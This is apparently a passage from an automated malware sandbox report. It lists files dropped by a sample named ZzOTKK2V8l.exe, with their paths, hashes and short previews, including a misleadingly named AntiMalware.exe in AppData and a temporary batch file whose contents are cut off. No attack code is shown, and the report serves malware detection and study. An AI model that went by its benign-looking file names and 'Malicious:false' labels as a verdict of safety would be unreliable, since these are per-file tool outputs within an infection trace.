                            Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                            Download File
                            Process:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            File Type:Unknown
                            Category:dropped
                            Size (bytes):330
                            Entropy (8bit):3.225178845784375
                            Encrypted:false
                            SSDEEP:6:kKrtG9lEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:jtElbkPlE99SNxAhUeVLVt
                            MD5:AED8258A2610E662D45792A77021243F
                            SHA1:FCF64A276D007BEF5FA147A11CD3A4D740261D00
                            SHA-256:A2D2409D1C2960A0287039969C66AA9B91AE167B72C7BCC22576C1B877D0E9EA
                            SHA-512:11ACD0B25828719C55468C3A69435F971AA4B850E5E956FE8120717CF954699D498A30BAFC6A5E15D14E29330E41B1B2E4FC7D9229D853D6DCBCF4A91A2FDF7D
                            Malicious:false
                            Preview:p...... ........pE..@...(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AntiMalware.exe.log

                            Download File
                            Process:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):1281
                            Entropy (8bit):5.370111951859942
                            Encrypted:false
                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ZzOTKK2V8l.exe.log

                            Download File
                            Process:C:\Users\user\Desktop\ZzOTKK2V8l.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):1281
                            Entropy (8bit):5.370111951859942
                            Encrypted:false
                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41czupjo.11w.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ag0v43kb.w5l.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdlqgb4l.wva.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwesvxkc.b1d.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fodzmeuf.our.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fojzr421.p4x.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fucrusc5.ocm.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2c43j1h.3mv.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghtzm0mx.onc.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfhbdawu.nmj.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khbwq4j5.vga.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxtew4vh.p23.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5eemjvw.uff.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5fxuzzg.r5e.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rb2ke5hn.ifi.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttvtkbfz.z3p.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujig1gei.dz1.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v50bsfgd.m0c.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwrzhkpr.nr3.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1mu3b4q.rej.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xchwvitp.ooz.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xj3jq34d.ljf.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xs4dv4nh.n33.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpo0oqp5.kfv.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat

                            Download File
                            Process:C:\Users\user\Desktop\ZzOTKK2V8l.exe
                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):157
                            Entropy (8bit):5.059068453581544
                            Encrypted:false
                            SSDEEP:3:mKDDCMNqTtvL5oUkh4EaKC5SMZJnMovmqRDUkh4E2J5xAInTRI+XFW1ZPy:hWKqTtT69aZ5/Z6ovmq1923fTf1wk
                            MD5:785ED261E3B437696CDCFBF04E339E4B
